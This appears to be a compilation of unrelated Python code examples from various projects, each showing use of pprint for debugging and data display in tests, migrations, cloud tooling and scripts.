Example #1
def test_branched():
    node = {'tiger': {'zip_left': '43210'}}
    key = 'tiger:zip_right'
    val = '01234'
    add_branched_item(key, val, node)
    pprint(node)
    assert node == {'tiger': {'zip_left': '43210', 'zip_right': '01234'}}
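
# add_branched_item is not shown above; a minimal sketch consistent with this
# test (an assumption, not the original implementation) could be:
def add_branched_item(key, val, node):
    # Walk/create one nested dict per ':'-separated prefix, then set the leaf.
    *branches, leaf = key.split(':')
    for branch in branches:
        node = node.setdefault(branch, {})
    node[leaf] = val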
Example #2
def main():
    parser = argparse.ArgumentParser(description='Analyze a bandersnatch mirror.')
    parser.add_argument('--json',
                       help='save raw data to a json file',
                       default=None)
    args = parser.parse_args()
    concurrency = 8
    root = "/var/spool/pypi/web/packages/source/"
    p = Pool()
    results = {}
    try:
        try:
            for path, result in \
                p.imap_unordered(analyse_sdist, yield_packages(root)):
                results[path] = result
            p.close()
        except:
            p.terminate()
            raise
    finally:
        p.join()
    if args.json:
        with open(args.json, 'wb') as f:
            f.write(json.dumps(results))
    pprint.pprint(results)
Example #3
    def any(self, provider_name):
        logging.info("logging in -- PROVIDER NAME IS: %s", provider_name)

        result = authomatic.login(Webapp2Adapter(self), provider_name)
        self.response.set_cookie('result', str(result))
        # user = User(result=result)
        # user.put()
        pprint.pprint('RESULT IS %s' % result)

        if result:
            if result.user:
                result.user.update()
                # Save the user name and ID to cookies so that we can use them in other handlers.
                self.response.set_cookie('user_id', result.user.id)
                logging.info('SET COOKIE WITH VALUE OF: %s', result.user.id)
                self.response.set_cookie('user_name', urllib.quote(result.user.name))

                if result.user.credentials:
                    # Serialize credentials and store it as well.
                    serialized_credentials = result.user.credentials.serialize()
                    self.response.set_cookie('credentials', serialized_credentials)

            elif result.error:
                self.response.set_cookie('error', urllib.quote(result.error.message))

            self.redirect('/')
Example #4
    def _get_cutters(self):
        """
        Returns a list of available cutters. Usbrelay cutters must be configured
        manually in the topology_builder.json file.

        Returns:
            List of aft.Cutter objects
        """
        cutters = []
        clewares = ClewareCutter.get_available_cutters()
        for c in clewares:
            for channel in range(c["sockets"]):
                param = {"cutter": c["cutter"], "channel": str(channel)}
                cutter = ClewareCutter(param)
                cutters.append(cutter)

        for port in self._config["edison"]["power_cutters"]:
            config = {"cutter": port}
            cutters.append(Usbrelay(config))

        if self._verbose:
            print "Acquired cutters:"

            for c in cutters:
                pprint.pprint(c.get_cutter_config())
            print ""

        return cutters
Example #5
def main():
    try:
        input = TestInput.TestInputParser.get_test_input(sys.argv)
    except AttributeError:
        print USAGE
    else:
        all_samples = list()
        while True:
            try:
                samples =\
                    [collect_index_barriers(s) for s in input.servers] +\
                    [collect_couchdb_tasks(s) for s in input.servers] +\
                    [collect_active_tasks(input.servers[0])]
                samples = filter(lambda sample: sample, samples)
                all_samples.extend(samples)

                pprint(samples)
                time.sleep(input.param('interval', 5))
            except KeyboardInterrupt:
                break
        filename = 'active_tasks_{0}.json'\
            .format(time.strftime('%Y%m%d_%H%M', time.localtime(time.time())))
        with open(filename, 'w') as fh:
            print '\nSaving all stats to: {0}'.format(filename)
            fh.write(json.dumps(all_samples, indent=4, sort_keys=True))
Example #6
    def submit(self):
        try:
            from modules.wma import makeRequest,approveRequest
            from wmcontrol import random_sleep
            print '\n\tFound wmcontrol\n'
        except:
            print '\n\tUnable to find wmcontrol modules. Please include it in your python path\n'
            if not self.testMode:
                print '\n\t QUIT\n'
                sys.exit(-17)

        import pprint
        for (n,d) in self.chainDicts.items():
            if self.testMode:
                print "Only viewing request",n
                pprint.pprint(d)
            else:
                #submit to wmagent each dict
                print "For eyes before submitting",n
                pprint.pprint(d)
                print "Submitting",n,"..........."
                workFlow=makeRequest(self.wmagent,d,encodeDict=True)
                approveRequest(self.wmagent,workFlow)
                print "...........",n,"submitted"
                random_sleep()
Example #7
def request():
  """Run when invoking slapos request. Request an instance."""
  # Parse arguments and initiate needed parameters
  # XXX-Cedric: move argument parsing to main entry point
  options = check_request_args()
  config = Config(options, options.configuration_file)
  local = init(config)
  # Request instance
  print("Requesting %s..." % config.reference)
  if config.software_url in local:
    config.software_url = local[config.software_url]
  try:
    partition = local['slap'].registerOpenOrder().request(
      software_release = config.software_url,
      partition_reference = config.reference,
      partition_parameter_kw = config.configuration,
      software_type = config.type,
      filter_kw = config.node,
      shared = config.slave
    )
    print "Instance requested.\nState is: %s." % partition.getState()
    print "Connection parameters of instance are:"
    pprint.pprint(partition.getConnectionParameterDict())
    print "You can rerun the command to get up-to-date information."
  except ResourceNotReady:
    print("Instance requested. Master is provisioning it. Please rerun in a "
        "couple of minutes to get connection information.")
    exit(2)
Example #8
 def printReport(self):
   import pprint
   print "Probabilities:"
   pprint.pprint(self.latest())
   print "Errors:"
   pprint.pprint(self.errors[-1])
   print "SSE: %s" % self.sse[-1]
Example #9
def barcode_ajax():
  """
  Called when the barcode form is submitted
  """
  print('barcode_ajax() TOP =========================================================================')
  print('-------------------')
  pprint(request)
  print('-------------------')


  # form data is in request
  if 'action' in request.form: # HTTP POST data comes in request object
    action  = request.form['action'] # sb_get_job_info, sb_get_part_info, etc..
  else:
    return json_punt()

  if 'arg1' in request.form:
    a1 = request.form['arg1']
  else:
    a1 = ''

  if 'arg2' in request.form:
    a2 = request.form['arg2']
  else:
    a2 = ''

  if 'arg3' in request.form:
    a3 = request.form['arg3']
  else:
    a3 = ''

  if (action == 'sb_execute_local'):
    #
    # execute locally
    #
    if (ex_local(a1,a2,a3)):
      m = 'barcode_ajax(): execute local: OK'
      d = {'error':0,'as_data':m,'as_html':m}
      return jsonify(d)
    else:
      return json_punt()

  else:
    #
    # send it up to the main server
    #
    r  =  aj_query(query = action,arg1 = a1, arg2 = a2, arg3 = a3)

    print('-------------------')

    j = json.loads(r.text)
    pprint(json.dumps(j))

    print('-------------------')

    try:
      return jsonify(j)
    except:
      return json_punt()
Example #10
def readJsonFile(jFile):
	with open(jFile, 'r') as inFile:
		params = json.load(inFile)

	getAnyRegret('Input_files/182-summary.json', params, 'example.json')

	pprint.pprint(params)	
Example #11
def read_available_plugins(raise_error=False):
    import json, bz2
    display_plugins = []
    try:
        raw = get_https_resource_securely(INDEX_URL)
        if not raw:
            return
        raw = json.loads(bz2.decompress(raw))
    except:
        if raise_error:
            raise
        traceback.print_exc()
        return
    for plugin in itervalues(raw):
        try:
            display_plugin = DisplayPlugin(plugin)
            get_installed_plugin_status(display_plugin)
            display_plugins.append(display_plugin)
        except:
            if DEBUG:
                prints('======= Plugin Parse Error =======')
                traceback.print_exc()
                import pprint
                pprint.pprint(plugin)
    display_plugins = sorted(display_plugins, key=lambda k: k.name)
    return display_plugins
Example #12
File: sort.py Project: jzlink/DPLA
def test():
    test = Profile()
    sortedFields = test.sort()

#    pprint.pprint(test.DPLAData)
#    print len(test.DPLAData[0]['sourceResource'])
    pprint.pprint(sortedFields)
Example #13
def get_ospf(vmid):
	
	result = FabricUtilNFV.get_vyatta_conf(vmid, "$SHOW protocols ospf")
	
	import pprint
	results = elementList.parseString(result)
	pprint.pprint( results.asList() )
	
	print '------------------------------'
	
	result = {"areas":[], "access-list":[], "redist-list":[]}
	for depth1 in results.asList():
		if depth1[0] in ['auto-cost','parameters']:
			result[depth1[0] + "_" + depth1[1][0][0]] = depth1[1][0][1]
			
		elif 'area' == depth1[0]:
			result['areas'].extend(parse_ospf_list(depth1))
		elif 'access-list' == depth1[0]:
			result['access-list'].extend(parse_ospf_list(depth1))
		elif 'redistribute' == depth1[0]:
			for item in depth1[1]:
				prot = {}
				prot['protocol'] = item[0]
				for item2 in item[1]:
					prot[item2[0]] = item2[1]
				result['redist-list'].append(prot)
		else:
			result[depth1[0]] = depth1[1]
			
		
	return {"success":"success", "msg":json.dumps(result)}
Example #14
 def test_parse_map(self):
     query = "fantasy_content.users{0}.user[1].games{0}.game[1]"
     r = self.parser.parse(query, self.json_obj)
     
     pprint(r)
     
     self.assertIsNotNone(r)
Example #15
    def pprint(self, resource, out=sys.stdout):
        """Pretty prints a resource or part of it.

        """

        if (isinstance(resource, dict)
                and 'object' in resource
                and 'resource' in resource):

            resource_id = resource['resource']
            if (SOURCE_RE.match(resource_id) or DATASET_RE.match(resource_id)
                    or MODEL_RE.match(resource_id)
                    or EVALUATION_RE.match(resource_id)
                    or ENSEMBLE_RE.match(resource_id)):
                out.write("%s (%s bytes)\n" % (resource['object']['name'],
                                               resource['object']['size']))
            elif PREDICTION_RE.match(resource['resource']):
                objective_field_name = (resource['object']['fields']
                                                [resource['object']
                                                 ['objective_fields'][0]]
                                                ['name'])
                input_data = (dict([[resource['object']['fields'][key]['name'],
                                    value]
                                    for key, value in
                                    resource['object']['input_data'].items()]))
                prediction = (
                    resource['object']['prediction']
                            [resource['object']['objective_fields'][0]])
                out.write("%s for %s is %s\n" % (objective_field_name,
                                                 input_data,
                                                 prediction))
            out.flush()
        else:
            pprint.pprint(resource, out, indent=4)
Example #16
def main():
    if APP_KEY == '' or APP_SECRET == '':
        sys.stderr.write("ERROR: Set your APP_KEY and APP_SECRET at the top of %r.\n" % __file__)
        sys.exit(1)

    prog_name, args = sys.argv[0], sys.argv[1:]
    if len(args) != 2:
        sys.stderr.write("Usage: %s <oauth1-access-token-key> <oauth1-access-token-secret>\n" % prog_name)
        sys.exit(1)

    access_token_key, access_token_secret = args

    sess = session.DropboxSession(APP_KEY, APP_SECRET)
    sess.set_token(access_token_key, access_token_secret)
    c = client.DropboxClient(sess)

    sys.stdout.write("Creating OAuth 2 access token...\n")
    oauth2_access_token = c.create_oauth2_access_token()

    sys.stdout.write("Using OAuth 2 access token to get account info...\n")
    c2 = client.DropboxClient(oauth2_access_token)
    pprint.pprint(c2.account_info(), stream=sys.stdout)

    sys.stdout.write("Disabling OAuth 1 access token...\n")
    c.disable_access_token()
Example #17
def main(argv):
    start_time = datetime.datetime.now()
    parser = ArgumentParser()
    parser.add_argument('--number', '-n', default='10', help='Number of entries to show')
    parser.add_argument('--outfile', '-o', action='store_true', default=False, dest='out',
                        help='File to output full listing of files')
    parser.add_argument('paths', nargs='+', help='Directories to list size of.')
    args = parser.parse_args()

    out_file = 'disk-usage.json'
    files_dict = {}
    paths_to_do = args.paths
    with open(out_file, 'w') as out_file_handle:
        for path_to_do in paths_to_do:
            for curdir, subdir, files in os.walk(path_to_do):
                for file in files:
                    if os.path.exists(os.path.join(curdir, file)):
                        files_dict[os.path.join(curdir, file)] = os.stat(os.path.join(curdir, file)).st_size
                        out_file_handle.write(
                            '%s,%s\n' % (os.path.join(curdir, file), os.stat(os.path.join(curdir, file)).st_size))

    sorted_files = (sorted(files_dict.iteritems(), key=operator.itemgetter(1), reverse=True))
    nice_numbers = [(file, convert_bytes(bytes)) for file, bytes in sorted_files]

    end_time = datetime.datetime.now()
    delta_time = end_time - start_time

    print delta_time
    if args.number == 'all':
        pprint(nice_numbers)
    else:
        pprint(nice_numbers[:int(args.number)])
Example #18
def save_hw(items, name, hwdir):
    'Save hw items for inspection on the server.'
    try:
        filename = os.path.join(hwdir, name + '.hw')
        pprint.pprint(items, stream=open(filename, 'w'))
    except Exception, xcpt:
        log("exception while saving hw file: %s" % str(xcpt))
Example #19
def collect_and_show_garbage():
    "Show what garbage is present."
    print 'Collecting...'
    n = gc.collect()
    print 'Unreachable objects:', n
    print 'Garbage:',
    pprint(gc.garbage)
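
# Minimal usage sketch (an assumption, not part of the original example):
# build a reference cycle so the collector has something to report, and keep
# everything the collector frees in gc.garbage so it can be printed.
import gc
from pprint import pprint  # needed by collect_and_show_garbage above

class Node(object):
    def __init__(self):
        self.me = self              # self-referencing cycle

gc.set_debug(gc.DEBUG_SAVEALL)      # collected objects are retained in gc.garbage
Node()
collect_and_show_garbage()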
Example #20
def test():
    # NOTE: if you are running this code on your computer, with a larger dataset, 
    # call the process_map procedure with pretty=False. The pretty=True option adds 
    # additional spaces to the output, making it significantly larger.
    data = process_map('example.osm', False)
    pprint.pprint(data)
    correct_first_elem = {
        "id": "261114295", 
        "visible": "true", 
        "type": "node", 
        "pos": [41.9730791, -87.6866303], 
        "created": {
            "changeset": "11129782", 
            "user": "******", 
            "version": "7", 
            "uid": "451048", 
            "timestamp": "2012-03-28T18:31:23Z"
        }
    }
    assert data[0] == correct_first_elem
    assert data[-1]["address"] == {
                                    "street": "West Lexington St.", 
                                    "housenumber": "1412"
                                      }
    assert data[-1]["node_refs"] == [ "2199822281", "2199822390",  "2199822392", "2199822369", 
                                    "2199822370", "2199822284", "2199822281"]
Example #21
def save_cmdb(cfg_dir, name, cmdb):
    'Save the cmdb.'
    filename = cmdb_filename(cfg_dir, name)
    try:
        pprint.pprint(cmdb, stream=open(filename, 'w'))
    except IOError, xcpt:
        log("exception while processing CMDB %s" % str(xcpt))
Example #22
def bootstrap_userstories():
    print "Mongo DB userstories: %s" % MUserStory.objects().count()
    # db.userstories.drop()
    print "Dropped! Mongo DB userstories: %s" % MUserStory.objects().count()

    print "UserStories: %s" % UserStory.objects.all().count()
    pprint(db.userstories.index_information())

    userstories = UserStory.objects.all().values()
    for userstory in userstories:
        try:
            story = Story.objects.get(pk=userstory['story_id'])
        except Story.DoesNotExist:
            continue
        try:
            userstory['story'] = MStory.objects(story_feed_id=story.story_feed.pk, story_guid=story.story_guid)[0]
        except:
            print '!',
            continue
        print '.',
        del userstory['id']
        del userstory['opinion']
        del userstory['story_id']
        try:
            MUserStory(**userstory).save()
        except:
            print '\n\n!\n\n'
            continue

    print "\nMongo DB userstories: %s" % MUserStory.objects().count()
Example #23
def bootstrap_feedpages():
    print "Mongo DB feed_pages: %s" % MFeedPage.objects().count()
    # db.feed_pages.drop()
    print "Dropped! Mongo DB feed_pages: %s" % MFeedPage.objects().count()

    print "FeedPages: %s" % FeedPage.objects.count()
    pprint(db.feed_pages.index_information())

    feeds = Feed.objects.all().order_by('-average_stories_per_month')
    feed_count = feeds.count()
    i = 0
    for feed in feeds:
        i += 1
        print "%s/%s: %s" % (i, feed_count, feed,)
        sys.stdout.flush()
        
        if not MFeedPage.objects(feed_id=feed.pk):
            feed_page = FeedPage.objects.filter(feed=feed).values()
            if feed_page:
                del feed_page[0]['id']
                feed_page[0]['feed_id'] = feed.pk
                try:
                    MFeedPage(**feed_page[0]).save()
                except:
                    print '\n\n!\n\n'
                    continue
        

    print "\nMongo DB feed_pages: %s" % MFeedPage.objects().count()
Example #24
def main():
    api = PopIt(instance = 'professors', hostname = '127-0-0-1.org.uk', port = 3000, user = '******', password = '******')

    # Create
    print("CREATE")
    new = api.person.post({'name': 'Albert Keinstein'})
    pprint(new)

    id = new['result']['_id']

    # Update
    print("UPDATE")
    result = api.person(id).put({"name": "Albert Einstein"})
    pprint(result)

    # Read
    print("READ")
    result = api.person(id).get()
    pprint(result)

    # read all
    results = api.person().get()
    pprint(results)

    # Delete
    print("DELETE")
    result = api.person(id).delete()
    pprint(result)
Example #25
def metadata_catalog(fits_filenames):
    "Histogram the metadata values in list of fits files."
    
    common, optional = metadata_field_use(fits_filenames)
    allfields = optional.union(common)
    histo = collections.defaultdict(int)
    values = collections.defaultdict(set)
    for fname in fits_filenames:
        hdulist = pyfits.open(fname)
        hdr = hdulist[0].header
        for field in allfields:
            if field in hdr:
                histo[field] += 1
                values[field].add(str(hdr[field]))
        hdulist.close()

    print('\n', '~'*78)
    print('Histogram of field use:')
    pprint(histo)

    print('\n', '~'*78)
    
    max_unique = 0.80
    print('Values used (max %s unique values):'%(max_unique))
    #! pprint(values)
    for k,v in values.items():
        if float(len(v))/len(fits_filenames) > max_unique: continue
        print('%8s: %s'%(k,', '.join(v)))
Example #26
def docdump(modname):
    mod = __import__( modname )

    print "module:", modname
    try:
        print modname+".__file__:", mod.__file__
    except AttributeError: print "undefined, probably built-in"

    print "\n-----------", modname+ ".__doc__: -------------"
    print mod.__doc__

    print "\n-----------", modname+ ".__dict__: -------------"
    pprint.pprint( mod.__dict__ )

    print "\n-----------", modname+ ".item's __doc__s: -------------"
    dic = mod.__dict__
    items = dic.keys()
    items.sort()
    for k in items:
        try:
            doc = dic[k].__doc__
            print "-----", k
            print doc
        except AttributeError:
            pass
    print "=================="
Example #27
    def __init__(self, funcs, ops, args, consts):
        # globals passed to eval - contains all constant, mangled op and mangled function names. Values are impls
        self.globals_by_name = {}
        # symbol tables
        self.var_types_by_name = {}
        self.func_types_by_name_types_in = {}
        self.op_types_by_op_types_in = {}
        self.args = []

        for name, type_out, _, val in consts:
            assert _ is None, "Constant %s not allowed types_in." % name
            self._check_name(name, internal=True)
            self.globals_by_name[name] = val
            self.var_types_by_name[name] = type_out
        for name, type_out, _, _ in args:
            self.args.append(name)
            self.var_types_by_name[name] = type_out
        for name, type_out, types_in, impl in funcs:
            self._check_name(name, internal=True)
            name_types_in = (name, types_in)
            assert name_types_in not in self.func_types_by_name_types_in, "Function name/type %r already exists" % (name_types_in,)
            assert name not in names_by_op
            self.func_types_by_name_types_in[name_types_in] = type_out
            self.globals_by_name[self._mangle(*name_types_in)] = impl
        for op, type_out, types_in, impl in ops:
            op_types_in = (op, types_in)
            assert op_types_in not in self.func_types_by_name_types_in, "Operator name/type %r already exists" % (op_types_in,)
            self.op_types_by_op_types_in[op_types_in] = type_out
            self.globals_by_name[self._mangle(*op_types_in)] = impl
        pprint(self.globals_by_name)
Example #28
def bootstrap_stories():
    print "Mongo DB stories: %s" % MStory.objects().count()
    # db.stories.drop()
    print "Dropped! Mongo DB stories: %s" % MStory.objects().count()

    print "Stories: %s" % Story.objects.all().count()
    pprint(db.stories.index_information())

    feeds = Feed.objects.all().order_by('-average_stories_per_month')
    feed_count = feeds.count()
    i = 0
    for feed in feeds:
        i += 1
        print "%s/%s: %s (%s stories)" % (i, feed_count,
                            feed, Story.objects.filter(story_feed=feed).count())
        sys.stdout.flush()
    
        stories = Story.objects.filter(story_feed=feed).values()
        for story in stories:
            # story['story_tags'] = [tag.name for tag in Tag.objects.filter(story=story['id'])]
            try:
                story['story_tags'] = json.decode(story['story_tags'])
            except:
                continue
            del story['id']
            del story['story_author_id']
            try:
                MStory(**story).save()
            except:
                continue

    print "\nMongo DB stories: %s" % MStory.objects().count()
Example #29
def test():
    fieldtypes = audit_file(CITIES, FIELDS)

    pprint.pprint(fieldtypes)

    assert fieldtypes["areaLand"] == set([type(1.1), type([]), type(None)])
    assert fieldtypes["areaMetro"] == set([type(1.1), type(None)])
Example #30
def bootstrap_classifiers():
    for sql_classifier, mongo_classifier in ((ClassifierTitle, MClassifierTitle), 
                                             (ClassifierAuthor, MClassifierAuthor), 
                                             (ClassifierFeed, MClassifierFeed),
                                             (ClassifierTag, MClassifierTag)):
        collection = mongo_classifier.meta['collection']
        print "Mongo DB classifiers: %s - %s" % (collection, mongo_classifier.objects().count())
        # db[collection].drop()
        print "Dropped! Mongo DB classifiers: %s - %s" % (collection, mongo_classifier.objects().count())

        print "%s: %s" % (sql_classifier._meta.object_name, sql_classifier.objects.all().count())
        pprint(db[collection].index_information())
        
        for userclassifier in sql_classifier.objects.all().values():
            del userclassifier['id']
            if sql_classifier._meta.object_name == 'ClassifierAuthor':
                author = StoryAuthor.objects.get(pk=userclassifier['author_id'])
                userclassifier['author'] = author.author_name
                del userclassifier['author_id']
            if sql_classifier._meta.object_name == 'ClassifierTag':
                tag = Tag.objects.get(pk=userclassifier['tag_id'])
                userclassifier['tag'] = tag.name
                del userclassifier['tag_id']
            print '.',
            try:
                mongo_classifier(**userclassifier).save()
            except:
                print '\n\n!\n\n'
                continue
            
        print "\nMongo DB classifiers: %s - %s" % (collection, mongo_classifier.objects().count())
Example #31
 def show_config(self):
     """ Print all options of charts"""
     pprint(self._option)
Example #32
def get_alb_data(elb_data, region, load_balancer_name):
    if debug:
        print("building the Application Load Balancer data structure")
    # this is used for building the load balancer spec
    alb_data = {
        'VpcId':
        elb_data['LoadBalancerDescriptions'][0]['VPCId'],
        'Region':
        region,
        'Alb_name':
        elb_data['LoadBalancerDescriptions'][0]['LoadBalancerName'],
        'Subnets':
        elb_data['LoadBalancerDescriptions'][0]['Subnets'],
        'Security_groups':
        elb_data['LoadBalancerDescriptions'][0]['SecurityGroups'],
        'Scheme':
        elb_data['LoadBalancerDescriptions'][0]['Scheme'],
        'Tags':
        elb_data['TagDescriptions'][0]['Tags'],
        'listeners': [],
        'target_group_attributes': [],
        'target_group_arns': []
    }

    # this is used for building the listeners specs
    for elb_listener in elb_data['LoadBalancerDescriptions'][0][
            'ListenerDescriptions']:
        # If there is an LBCookieStickinessPolicy, append TG attributes
        if len(elb_listener['PolicyNames']) > 0:
            if 'LBCookieStickinessPolicy' in elb_listener['PolicyNames'][0]:
                for policy in elb_data['PolicyDescriptions']:
                    if elb_listener['PolicyNames'][0] == policy['PolicyName']:
                        listener = {
                            'Protocol':
                            elb_listener['Listener']['Protocol'],
                            'Port':
                            elb_listener['Listener']['LoadBalancerPort'],
                            'TargetGroup_Port':
                            elb_listener['Listener']['InstancePort'],
                            'TargetGroup_Protocol':
                            elb_listener['Listener']['InstanceProtocol']
                        }
                        TargetGroup_Attribute = {
                            'dereg_timeout_seconds_delay':
                            str(elb_data['LoadBalancerAttributes']
                                ['ConnectionDraining']['Timeout']),
                            'stickiness.enabled':
                            'true',
                            'stickiness.type':
                            'lb_cookie',
                            'stickiness_policy':
                            policy['PolicyName'].split('-')[3],
                            'stickiness.lb_cookie.duration_seconds':
                            policy['PolicyAttributeDescriptions'][0]
                            ['AttributeValue'],
                            'TargetGroup_Port':
                            elb_listener['Listener']['InstancePort']
                        }
                        if listener['Protocol'] == "HTTPS":
                            listener['Certificates'] = [{
                                'CertificateArn':
                                elb_listener['Listener']['SSLCertificateId']
                            }]
            else:
                listener = {
                    'Protocol':
                    elb_listener['Listener']['Protocol'],
                    'Port':
                    elb_listener['Listener']['LoadBalancerPort'],
                    'TargetGroup_Port':
                    elb_listener['Listener']['InstancePort'],
                    'TargetGroup_Protocol':
                    elb_listener['Listener']['InstanceProtocol']
                }
                TargetGroup_Attribute = {
                    'dereg_timeout_seconds_delay':
                    str(elb_data['LoadBalancerAttributes']
                        ['ConnectionDraining']['Timeout']),
                    'TargetGroup_Port':
                    elb_listener['Listener']['InstancePort']
                }
                if listener['Protocol'] == "HTTPS":
                    listener['Certificates'] = [{
                        'CertificateArn':
                        elb_listener['Listener']['SSLCertificateId']
                    }]
            # TGs are not per unique backend port, as two TGs might have two
            # different stickiness policies
            alb_data['listeners'].append(listener)
            alb_data['target_group_attributes'].append(TargetGroup_Attribute)
    # this is used for building the target groups
    # We need to create more target groups if the ELB front port has a
    # Duration-Based sticky policy

    alb_data['target_groups'] = []
    hc_target = elb_data['LoadBalancerDescriptions'][0]['HealthCheck'][
        'Target']
    # Append unique stickiness policy name to Target Group Name
    for listener in alb_data['listeners']:
        for target_group_attribute in alb_data['target_group_attributes']:
            target_group = {
                'HealthCheckTimeoutSeconds':
                elb_data['LoadBalancerDescriptions'][0]['HealthCheck']
                ['Timeout']
            }
            # We only offer 15 seconds minimum health check interval
            if elb_data['LoadBalancerDescriptions'][0]['HealthCheck'][
                    'Interval'] < 15:
                print(
                    "HealthCheck Interval is less than 15 seconds! Setting it to 15 seconds"
                )
                target_group['HealthCheckIntervalSeconds'] = 15
            else:
                target_group['HealthCheckIntervalSeconds'] = elb_data[
                    'LoadBalancerDescriptions'][0]['HealthCheck']['Interval']
            target_group['HealthyThresholdCount'] = elb_data[
                'LoadBalancerDescriptions'][0]['HealthCheck'][
                    'HealthyThreshold']
            target_group['UnhealthyThresholdCount'] = elb_data[
                'LoadBalancerDescriptions'][0]['HealthCheck'][
                    'UnhealthyThreshold']
            target_group['HealthCheckPath'] = '/' + hc_target.split('/', 1)[1]
            target_group['HealthCheckPort'] = hc_target[hc_target.index(':') +
                                                        1:hc_target.index('/')]
            target_group['HealthCheckProtocol'] = hc_target.split(':')[0]
            target_group['VpcId'] = elb_data['LoadBalancerDescriptions'][0][
                'VPCId']
            if listener['TargetGroup_Port'] == target_group_attribute[
                    'TargetGroup_Port']:
                target_group['Port'] = listener['TargetGroup_Port']
                target_group['Protocol'] = listener['TargetGroup_Protocol']
                if 'stickiness.type' in target_group_attribute:
                    target_group[
                        'Name'] = load_balancer_name[:23] + "-tg-" + str(
                            listener['TargetGroup_Port']) + "-" + (
                                target_group_attribute['stickiness_policy'])
                    # Only append unique Target Group
                    if not any(tg['Name'] == target_group['Name']
                               for tg in alb_data['target_groups']):
                        alb_data['target_groups'].append(target_group)
                else:
                    target_group[
                        'Name'] = load_balancer_name[:23] + "-tg-" + str(
                            listener['TargetGroup_Port'])
                    # Only append unique Target Group
                    if not any(tg['Name'] == target_group['Name']
                               for tg in alb_data['target_groups']):
                        alb_data['target_groups'].append(target_group)

    # create alb attributes
    alb_data['attributes'] = []
    attributes = []
    attribute = {
        'Key':
        'idle_timeout.timeout_seconds',
        'Value':
        str(elb_data['LoadBalancerAttributes']['ConnectionSettings']
            ['IdleTimeout'])
    }
    attributes.append(attribute)
    if elb_data['LoadBalancerAttributes']['AccessLog']['Enabled']:
        attribute = {
            'Key':
            'access_logs.s3.enabled',
            'Value':
            str(elb_data['LoadBalancerAttributes']['AccessLog']
                ['Enabled']).lower()
        }
        attributes.append(attribute)
        attribute = {
            'Key':
            'access_logs.s3.bucket',
            'Value':
            elb_data['LoadBalancerAttributes']['AccessLog']['S3BucketName']
        }
        attributes.append(attribute)
        # we don't specify the prefix key if the prefix is root
        if elb_data['LoadBalancerAttributes']['AccessLog'][
                'S3BucketPrefix'] != '':
            attribute = {
                'Key':
                'access_logs.s3.prefix',
                'Value':
                elb_data['LoadBalancerAttributes']['AccessLog']
                ['S3BucketPrefix']
            }
            attributes.append(attribute)
    alb_data['attributes'] = attributes
    alb_data['instanceIds'] = []
    for instance in elb_data['LoadBalancerDescriptions'][0]['Instances']:
        alb_data['instanceIds'].append(instance['InstanceId'])
    if debug:
        print("alb_data:")
        pprint(alb_data)
    return alb_data
Example #33
def split_table_by_chr(chromosome, project_id, dataset_id, log):
    # this is a new connection to the new project
    bigquery_service = get_service()
    jobCollection = bigquery_service.jobs()

    try:
        query_request = bigquery_service.jobs()
        # maybe there is a nice way to format this one?
        query = """\
            SELECT data.ParticipantBarcode AS ParticipantBarcode, data.SampleBarcode AS SampleBarcode, data.SampleTypeLetterCode AS SampleTypeLetterCode, \
                data.AliquotBarcode AS AliquotBarcode, data.Platform AS Platform, data.Study AS Study, data.Probe_Id AS Probe_Id, data.Beta_Value as Beta_Value 
            FROM \
                ( \
                  SELECT IlmnID \
                  FROM [platform_reference.methylation_annotation] \
                  WHERE ( CHR == "{0}")\
                ) AS ids \
            JOIN EACH \
                (\
                  SELECT * \
                  FROM [{1}.Methylation] \
                ) AS data \
            ON ids.IlmnID == data.Probe_Id""".format(chromosome, dataset_id)

        log.info('importing chromosome %s\n%s' % (chromosome, query))
        #        query_data = {'query': query}
        query_data = {
            'configuration': {
                'query': {
                    'query': query,
                    'useQueryCache': False,
                    'destinationTable': {
                        'projectId': project_id,
                        'datasetId': dataset_id,
                        'tableId': 'Methylation_chr{0}'.format(chromosome)
                    },
                    'createDisposition': 'CREATE_IF_NEEDED',
                    'writeDisposition': 'WRITE_EMPTY',
                    'allowLargeResults': True
                }
            }
        }
        insertResponse = query_request.insert(projectId=project_id,
                                              body=query_data).execute()
        # Ping for status until it is done, with a short pause between calls.
        while True:
            result = jobCollection.get(
                projectId=project_id,
                jobId=insertResponse['jobReference']['jobId']).execute()
            status = result['status']
            if 'DONE' == status['state']:
                if 'errorResult' in status and status['errorResult']:
                    log.error(
                        'an error occurred completing import at \'%s\': %s \'%s\' for chromosome %s'
                        % (status['errorResult']['location'],
                           status['errorResult']['reason'],
                           status['errorResult']['message'], chromosome))
                else:
                    log.info('completed import chromosome %s' % (chromosome))
                break
            if 'errors' in status and status['errors'] and 0 < len(
                    status['errors']):
                for error in status['errors']:
                    log.warning('\terror while importing chromosome %s: %s' %
                                (chromosome, error))
            log.info(
                '\tWaiting for the import to complete for chromosome %s...' %
                (chromosome))
            time.sleep(20)

    except HttpError as err:
        print 'Error:'
        pprint.pprint(err.content)

    except AccessTokenRefreshError:
        print(
            "Credentials have been revoked or expired, please re-run"
            "the application to re-authorize")
Example #34
import sys

sys.stdin = open('input.txt')

N = int(input())
K = int(input())

B = []
A = [[0] * N for _ in range(N)]
for y in range(1, N + 1):
    for x in range(1, N + 1):
        A[y - 1][x - 1] = y * x
        B.append(y * x)
from pprint import pprint
pprint(A)
B.sort()
print(B)
print(B[K - 1])

low = 1
high = N * N
while low <= high:
    mid = (low + high) // 2

    cnt = 0
    for i in range(1, N + 1):
        cnt += (mid // i)
    if cnt > K + 1:
        high = mid - 1
    else:
        low = mid + 1
Example #35
# How many different ways can you combine two of the letters from "abcd"?
from itertools import combinations

len(list(combinations("abcd", 2)))
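
# Result = 6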

## Save this file as profiles.json inside of your exercises directory. 
# Use the load function from the json module to open this file, it will 
# produce a list of dictionaries. Using this data, write some code that 
# calculates and outputs the following information:

import json
from pprint import pprint

new_dictionary = json.load(open("profiles.json"))

pprint(new_dictionary)

new_dictionary[0].keys() # This returns all keys in a dictionary

# Total number of users

len([x['_id'] for x in new_dictionary])     

# Result = 19

# Number of active users
len([x['_id'] for x in new_dictionary if x['isActive']]) 

# Result = 9

# Number of inactive users
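# (the source snippet ends here; a sketch of the natural completion, following
#  the pattern of the two queries above)
len([x['_id'] for x in new_dictionary if not x['isActive']])

# Result = 10 (19 total users - 9 active)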
Example #36
    def unit_size(self, children):
        return {"quantity": children[0].children[0], "unit": children[1]}

    def ingredient(self, children):
        result = {}
        for child in children:
            if child.data == "quantity":
                result['quantity'] = child.children[0]
            if child.data == "unit":
                result['unit'] = child.children[0]
            if child.data == "base_ingredient":
                result["base_ingredient"] = " ".join(
                    [x.value.strip() for x in child.children])

        return result


